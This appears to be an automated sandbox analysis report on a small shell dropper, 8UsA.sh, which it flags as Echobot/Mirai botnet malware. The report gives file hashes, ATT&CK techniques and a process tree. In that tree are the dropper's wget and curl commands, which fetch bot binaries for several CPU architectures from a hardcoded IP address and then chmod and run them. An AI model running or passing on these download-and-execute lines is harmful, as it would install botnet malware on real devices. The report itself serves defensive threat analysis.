Analysis
-
max time kernel
151s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
22-11-2024 18:59
Static task
static1
Behavioral task
behavioral1
Sample
8UsA.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
8UsA.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
8UsA.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
8UsA.sh
-
Size
1KB
-
MD5
513641f5f60d55559c2060489de6d605
-
SHA1
c95feec2255732b60d434b0639b88a5cff205ea0
-
SHA256
1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
-
SHA512
71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
-
Detected Echobot 2 IoCs
Processes:
resource yara_rule /tmp/UnHAnaAW.x86 family_echobot /tmp/3AvA family_echobot -
Echobot family
-
Mirai family
-
Contacts a large (149409) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid process 756 chmod 812 chmod 828 chmod 722 chmod 728 chmod -
Executes dropped EXE 5 IoCs
Processes:
3AvA3AvA3AvA3AvA3AvAioc pid process /tmp/3AvA 723 3AvA /tmp/3AvA 729 3AvA /tmp/3AvA 757 3AvA /tmp/3AvA 813 3AvA /tmp/3AvA 829 3AvA -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
Processes:
3AvA3AvA3AvA3AvAdescription ioc process File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA File opened for modification /dev/misc/watchdog 3AvA File opened for modification /dev/watchdog 3AvA -
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
Processes:
3AvA3AvA3AvA3AvAdescription ioc process File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 4 IoCs
Processes:
3AvA3AvA3AvA3AvAdescription ioc pid process Changes the process name, possibly in an attempt to hide itself c3j15pmc1d0ej4cbg52 729 3AvA Changes the process name, possibly in an attempt to hide itself fgik5d2i4ojdbg0 757 3AvA Changes the process name, possibly in an attempt to hide itself h451em3akb3ehak414h 813 3AvA Changes the process name, possibly in an attempt to hide itself 25kk5od1001b 829 3AvA -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
3AvA3AvA3AvA3AvAdescription ioc process File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA File opened for reading /proc/net/tcp 3AvA -
Processes:
3AvA3AvA3AvA3AvAcurlcurlcurldescription ioc process File opened for reading /proc/374/fd 3AvA File opened for reading /proc/138/fd 3AvA File opened for reading /proc/663/fd 3AvA File opened for reading /proc/664/fd 3AvA File opened for reading /proc/665/fd 3AvA File opened for reading /proc/785/fd 3AvA File opened for reading /proc/799/fd 3AvA File opened for reading /proc/740/exe 3AvA File opened for reading /proc/836/exe 3AvA File opened for reading /proc/665/exe 3AvA File opened for reading /proc/748/exe 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/383/fd 3AvA File opened for reading /proc/400/fd 3AvA File opened for reading /proc/685/fd 3AvA File opened for reading /proc/357/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/356/fd 3AvA File opened for reading /proc/164/fd 3AvA File opened for reading /proc/319/fd 3AvA File opened for reading /proc/814/exe 3AvA File opened for reading /proc/664/fd 3AvA File opened for reading /proc/138/fd 3AvA File opened for reading /proc/319/fd 3AvA File opened for reading /proc/814/fd 3AvA File opened for reading /proc/374/fd 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/372/fd 3AvA File opened for reading /proc/400/fd 3AvA File opened for reading /proc/228/fd 3AvA File opened for reading /proc/383/fd 3AvA File opened for reading /proc/228/fd 3AvA File opened for reading /proc/663/exe 3AvA File opened for reading /proc/689/exe 3AvA File opened for reading /proc/655/exe 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/325/fd 3AvA File opened for reading /proc/693/fd 3AvA File opened for reading /proc/787/fd 3AvA File opened for reading /proc/820/exe 3AvA File opened for reading /proc/1/fd 3AvA File opened for reading /proc/400/fd 3AvA File opened for reading /proc/736/exe 3AvA File opened for reading /proc/768/fd 3AvA File opened for reading /proc/663/fd 3AvA File opened for reading /proc/690/exe 3AvA File opened for reading /proc/164/fd 3AvA File opened for reading /proc/730/exe 3AvA File opened for reading /proc/321/fd 3AvA File opened for reading /proc/357/fd 3AvA File opened for reading /proc/325/fd 3AvA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/357/fd 3AvA File opened for reading /proc/372/fd 3AvA File opened for reading /proc/664/exe 3AvA File opened for reading /proc/787/exe 3AvA File opened for reading /proc/768/fd 3AvA File opened for reading /proc/785/fd 3AvA File opened for reading /proc/693/fd 3AvA File opened for reading /proc/319/fd 3AvA File opened for reading /proc/693/exe 3AvA File opened for reading /proc/372/fd 3AvA File opened for reading /proc/698/fd 3AvA File opened for reading /proc/228/fd 3AvA -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
3AvAwgetcurlcatpid process 729 3AvA 725 wget 726 curl 727 cat -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetcurlwgetcurlcurlcurlwget8UsA.shcurldescription ioc process File opened for modification /tmp/UnHAnaAW.mips wget File opened for modification /tmp/UnHAnaAW.arm5 wget File opened for modification /tmp/UnHAnaAW.x86 wget File opened for modification /tmp/UnHAnaAW.x86 curl File opened for modification /tmp/UnHAnaAW.mpsl wget File opened for modification /tmp/UnHAnaAW.mpsl curl File opened for modification /tmp/UnHAnaAW.arm4 curl File opened for modification /tmp/UnHAnaAW.arm5 curl File opened for modification /tmp/UnHAnaAW.arm6 wget File opened for modification /tmp/3AvA 8UsA.sh File opened for modification /tmp/UnHAnaAW.mips curl
Processes
-
/tmp/8UsA.sh/tmp/8UsA.sh1⤵
- Writes file to tmp directory
PID:693 -
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.x862⤵
- Writes file to tmp directory
PID:699
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.x862⤵
- Writes file to tmp directory
PID:713
-
-
/bin/catcat UnHAnaAW.x862⤵PID:721
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-YDKfVW UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:723
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:725
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:726
-
-
/bin/catcat UnHAnaAW.mips2⤵
- System Network Configuration Discovery
PID:727
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-YDKfVW UnHAnaAW.mips UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:729
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵
- Writes file to tmp directory
PID:739
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:757
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm42⤵PID:792
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm42⤵
- Writes file to tmp directory
PID:802
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:813
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm52⤵
- Writes file to tmp directory
PID:823
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh UnHAnaAW.arm4 UnHAnaAW.arm5 UnHAnaAW.mips UnHAnaAW.mpsl UnHAnaAW.x862⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:829
-
-
/usr/bin/wgetwget http://89.22.230.162/bins/UnHAnaAW.arm62⤵
- Writes file to tmp directory
PID:839
-
-
/usr/bin/curlcurl -O http://89.22.230.162/bins/UnHAnaAW.arm62⤵PID:840
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98KB
MD51bfd79e3eb8d1d5806b78c2ee800ccbe
SHA18c7d5fb0ffe8c51e83cfe644a961d3b2bedb5e83
SHA256186fc8b8165ee76f730ea3b840c59473597282c472529c9b2716baab011787da
SHA512ade41301de6fdcbd940dd4a2cd7634ffd13dfb4f24c7b2e9b3e25aae7d3a7b1dce4817eada98e628d591cf8fcd1106d5292bee05ba3bcd6b6cc502135409bc0b
-
Filesize
69KB
MD54a5306ed50853b2ce31d13763bde2cd3
SHA112a84067a5b8ff314e005365faadd34d47ce0619
SHA25681d46cb68a82a4f80f26f017a9e988acd67811fb5b461df2546a23ccc5f6a05d
SHA512b9732bdbe82f34591e5e21b45f80fa7f465932aa6a6f07fd3389a866b0a94b39bd59d4f298fdd896e9b9a601bd4d72494338b1a5817d558ba3b6d2ed1d43e081